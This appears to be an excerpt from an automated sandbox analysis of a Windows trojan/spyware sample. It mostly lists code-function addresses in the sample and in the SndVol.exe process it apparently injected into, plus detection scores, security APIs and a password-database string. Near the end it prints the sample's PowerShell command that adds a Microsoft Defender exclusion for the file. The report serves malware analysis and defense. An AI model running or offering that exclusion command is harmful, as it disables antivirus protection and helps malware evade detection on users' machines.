                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740C638 | 0_2_0740C638
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740A508 | 0_2_0740A508
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740AD28 | 0_2_0740AD28
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740D760 | 0_2_0740D760
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740D770 | 0_2_0740D770
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740B718 | 0_2_0740B718
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740C60D | 0_2_0740C60D
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07409619 | 0_2_07409619
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07409628 | 0_2_07409628
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740AD1A | 0_2_0740AD1A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740E5C0 | 0_2_0740E5C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740EDD0 | 0_2_0740EDD0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740EDE0 | 0_2_0740EDE0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_074045A1 | 0_2_074045A1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740E5B0 | 0_2_0740E5B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740E5B8 | 0_2_0740E5B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740A4F7 | 0_2_0740A4F7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740EB40 | 0_2_0740EB40
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740EB50 | 0_2_0740EB50
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740E9D0 | 0_2_0740E9D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0740E9E0 | 0_2_0740E9E0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23198 | 0_2_07C23198
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C24B10 | 0_2_07C24B10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C2C778 | 0_2_07C2C778
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23680 | 0_2_07C23680
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23670 | 0_2_07C23670
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C2E4F0 | 0_2_07C2E4F0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23420 | 0_2_07C23420
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C24420 | 0_2_07C24420
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C24430 | 0_2_07C24430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23430 | 0_2_07C23430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C2C340 | 0_2_07C2C340
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C23188 | 0_2_07C23188
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C2316F | 0_2_07C2316F
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C20040 | 0_2_07C20040
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C20007 | 0_2_07C20007
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C24FE1 | 0_2_07C24FE1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07C24FF0 | 0_2_07C24FF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C24B000_2_07C24B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C238C80_2_07C238C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07C238D80_2_07C238D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0DF51F600_2_0DF51F60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00418C134_2_00418C13
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004029804_2_00402980
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0042F2634_2_0042F263
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004033C04_2_004033C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004023FB4_2_004023FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0041047C4_2_0041047C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004024004_2_00402400
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004104834_2_00410483
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004025E44_2_004025E4
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004025F04_2_004025F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402E404_2_00402E40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416E034_2_00416E03
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402E324_2_00402E32
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E6834_2_0040E683
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004106A34_2_004106A3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E7D34_2_0040E7D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A81584_2_017A8158
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA1184_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017101004_2_01710100
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D81CC4_2_017D81CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E01AA4_2_017E01AA
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B20004_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA3524_2_017DA352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E3F04_2_0172E3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E03E64_2_017E03E6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C02744_2_017C0274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A02C04_2_017A02C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017205354_2_01720535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E05914_2_017E0591
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D24464_2_017D2446
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE4F64_2_017CE4F6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017207704_2_01720770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017447504_2_01744750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171C7C04_2_0171C7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173C6E04_2_0173C6E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017369624_2_01736962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017229A04_2_017229A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017EA9A64_2_017EA9A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017228404_2_01722840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172A8404_2_0172A840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0174E8F04_2_0174E8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017068B84_2_017068B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DAB404_2_017DAB40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D6BD74_2_017D6BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171EA804_2_0171EA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BCD1F4_2_017BCD1F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172AD004_2_0172AD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171ADE04_2_0171ADE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01738DBF4_2_01738DBF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720C004_2_01720C00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01710CF24_2_01710CF2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C0CB54_2_017C0CB5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01794F404_2_01794F40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740F304_2_01740F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01762F284_2_01762F28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172CFE04_2_0172CFE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01712FC84_2_01712FC8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179EFA04_2_0179EFA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01720E594_2_01720E59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DEE264_2_017DEE26
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DEEDB4_2_017DEEDB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01732E904_2_01732E90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DCE934_2_017DCE93
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170F1724_2_0170F172
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017EB16B4_2_017EB16B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175516C4_2_0175516C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172B1B04_2_0172B1B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D70E94_2_017D70E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF0E04_2_017DF0E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CF0CC4_2_017CF0CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017270C04_2_017270C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170D34C4_2_0170D34C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D132D4_2_017D132D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0176739A4_2_0176739A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C12ED4_2_017C12ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173B2C04_2_0173B2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017252A04_2_017252A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D75714_2_017D7571
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BD5B04_2_017BD5B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017114604_2_01711460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF43F4_2_017DF43F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DF7B04_2_017DF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D16CC4_2_017D16CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017299504_2_01729950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173B9504_2_0173B950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B59104_2_017B5910
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178D8004_2_0178D800
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017238E04_2_017238E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFB764_2_017DFB76
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01795BF04_2_01795BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175DBF94_2_0175DBF9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173FB804_2_0173FB80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01793A6C4_2_01793A6C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFA494_2_017DFA49
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D7A464_2_017D7A46
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CDAC64_2_017CDAC6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01765AA04_2_01765AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BDAAC4_2_017BDAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D7D734_2_017D7D73
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D1D5A4_2_017D1D5A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01723D404_2_01723D40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173FDC04_2_0173FDC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01799C324_2_01799C32
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFCF24_2_017DFCF2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFF094_2_017DFF09
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DFFB14_2_017DFFB1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01721F924_2_01721F92
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01729EB04_2_01729EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E05359_2_050E0535
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A05919_2_051A0591
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051844209_2_05184420
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051924469_2_05192446
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518E4F69_2_0518E4F6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051047509_2_05104750
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E07709_2_050E0770
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DC7C09_2_050DC7C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FC6E09_2_050FC6E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D01009_2_050D0100
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517A1189_2_0517A118
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051681589_2_05168158
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A01AA9_2_051A01AA
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051981CC9_2_051981CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051720009_2_05172000
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519A3529_2_0519A352
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051A03E69_2_051A03E6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EE3F09_2_050EE3F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051802749_2_05180274
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051602C09_2_051602C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517CD1F9_2_0517CD1F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EAD009_2_050EAD00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F8DBF9_2_050F8DBF
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DADE09_2_050DADE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E0C009_2_050E0C00
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05180CB59_2_05180CB5
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D0CF29_2_050D0CF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05100F309_2_05100F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05182F309_2_05182F30
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05122F289_2_05122F28
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05154F409_2_05154F40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0515EFA09_2_0515EFA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D2FC89_2_050D2FC8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050ECFE09_2_050ECFE0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519EE269_2_0519EE26
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E0E599_2_050E0E59
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519CE939_2_0519CE93
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F2E909_2_050F2E90
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519EEDB9_2_0519EEDB
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050F69629_2_050F6962
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E29A09_2_050E29A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051AA9A69_2_051AA9A6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E28409_2_050E2840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EA8409_2_050EA840
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050C68B89_2_050C68B8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0510E8F09_2_0510E8F0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519AB409_2_0519AB40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05196BD79_2_05196BD7
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050DEA809_2_050DEA80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051975719_2_05197571
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517D5B09_2_0517D5B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F43F9_2_0519F43F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050D14609_2_050D1460
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F7B09_2_0519F7B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051916CC9_2_051916CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051AB16B9_2_051AB16B
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0511516C9_2_0511516C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050CF1729_2_050CF172
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050EB1B09_2_050EB1B0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E70C09_2_050E70C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518F0CC9_2_0518F0CC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051970E99_2_051970E9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519F0E09_2_0519F0E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519132D9_2_0519132D
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050CD34C9_2_050CD34C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0512739A9_2_0512739A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E52A09_2_050E52A0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FB2C09_2_050FB2C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_051812ED9_2_051812ED
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05191D5A9_2_05191D5A
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E3D409_2_050E3D40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05197D739_2_05197D73
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FFDC09_2_050FFDC0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05159C329_2_05159C32
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FCF29_2_0519FCF2
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FF099_2_0519FF09
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E1F929_2_050E1F92
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FFB19_2_0519FFB1
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E9EB09_2_050E9EB0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E99509_2_050E9950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FB9509_2_050FB950
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0514D8009_2_0514D800
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050E38E09_2_050E38E0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FB769_2_0519FB76
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_050FFB809_2_050FFB80
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05155BF09_2_05155BF0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0511DBF99_2_0511DBF9
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0519FA499_2_0519FA49
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05197A469_2_05197A46
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05153A6C9_2_05153A6C
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05125AA09_2_05125AA0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0517DAAC9_2_0517DAAC
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_05181AA39_2_05181AA3
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0518DAC69_2_0518DAC6
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A1F109_2_030A1F10
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309CE399_2_0309CE39
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309CE409_2_0309CE40
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309B1909_2_0309B190
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309B0409_2_0309B040
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0309D0609_2_0309D060
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A37C09_2_030A37C0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030A55D09_2_030A55D0
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030BBC209_2_030BBC20
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E4739_2_04F8E473
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E3559_2_04F8E355
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8D8D89_2_04F8D8D8
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8E80F9_2_04F8E80F
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04F8CB789_2_04F8CB78
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 05115130 appears 50 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 0515F290 appears 105 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 05127E54 appears 102 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 050CB970 appears 277 times
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: String function: 0514EA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0178EA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0170B970 appears 275 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 01755130 appears 58 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0179F290 appears 105 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 01767E54 appears 101 times
Source: file.exe, 00000000.00000002.1326280149.000000000129E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1358933336.000000000A7A0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000000.1304212812.0000000000C72000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamefYaO.exeD vs file.exe
Source: file.exe, 00000004.00000002.1669747825.000000000180D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenamefYaO.exeD vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.4af1228.2.raw.unpack, Op9oSDQex61ZbKAB8f.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.4af1228.2.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.a7a0000.4.raw.unpack, rBxlgrxj8aX9QyCKGq.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.a7a0000.4.raw.unpack, Op9oSDQex61ZbKAB8f.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/7@15/12
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jslb2lgq.fqy.ps1
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SndVol.exe, 00000009.00000002.3761170910.0000000003367000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1862516130.0000000003338000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1862381746.0000000003317000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000002.3761170910.0000000003338000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000009.00000003.1864462711.0000000003343000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | Virustotal: Detection: 30%
Source: file.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
